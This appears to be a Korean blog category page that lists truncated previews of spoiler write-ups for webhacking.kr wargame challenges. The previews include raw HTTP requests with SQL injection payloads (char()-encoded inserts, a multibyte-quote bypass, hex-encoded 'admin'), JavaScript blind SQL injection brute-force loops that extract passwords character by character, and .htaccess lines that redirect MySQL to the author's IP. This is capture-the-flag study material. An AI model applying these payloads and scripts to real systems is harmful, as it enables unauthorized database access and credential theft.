본문 바로가기

Hacking/Webhacking.kr(스포주의)

 (42)
Webhacking.kr 29 POST /challenge/web/web-14/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 262Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36HTTPS: 1Content-Type:..
Webhacking.kr 35 GET /challenge/web/web-17/index.php?phone=1),(char(97,100,109,105,110),char(49,50,53,46,49,51,49,46,49,56,57,46,54,49),1 HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36HTTPS: 1..
Webhacking.kr 45 Blind SQL Injection문제이다. time=1 and (select length(Password) from FreeB0aRd)=9 테이블명은 페이지에 노출, 컬럼명은 dictionary = "0123456789abcdefghijklmnopqrstuvwxyz_"; password = ""; function go(query,n) { query = "0 or (select ascii(substr(Password,"+n+",1)) from FreeB0aRd)="+query document.cookie="time="+query; // sql injection 쿼리문을 time 쿠키에 대입 console.log(query); x = new XMLHttpRequest(); x.open("GET","inde..
blind sql injection dictionary = "abcdefghijklmnopqrstuvwxyz0123456789_"; // 패스워드로 추측되는 문자열 password = ""; // 획득한 패스워드를 저장하기 위한 변수 function go(query,n) // 패스워드로 추측되는 문자의 아스키 코드=query , substr의 길이=n { query = "2 and ascii(substr(pw,”+n+",1))="+query; // no 2의 패스워드를 한 바이트씩 대입하기 위한 변수 console.log(query); // 브루트포스 진행사항을 웹브라우저 콘솔에 출력 x = new XMLHttpRequest(); // request 전송을 위한 객체 생성 x.open("GET","index.php?no="+query,fa..
Webhacking.kr 45 GET /challenge/web/web-22/index.php?id=%aa'%09or%09id%3d%090x61646d696e%23&pw=guest HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36HTTPS: 1Referer: http://webhacking.kr/challen..
Webhacking.kr 30 .htaccess파일을 통해 웹서버 Default 정보를 불러오도록 하는 문제입니다. php_admin_value mysql.default_host "내 아이피 주소"php_admin_value mysql.default_user "a"php_admin_value mysql.default_password "a"
Webhacking.kr 37 타임스템프에 해당되는 파일 생성 이후 사용자가 업로드한 팡ㄹ을 생성해서 덮어씌우면 http://webhacking.kr/challenge/web/web-18/index.phps POST /challenge/web/web-18/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 201Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_..
Webhacking.kr 61 컬럼명 변경에 관한 문제이다. magic gpc떄문에 hex로 입력 0x61646d696e 0x61646d696e as id

티스토리툴바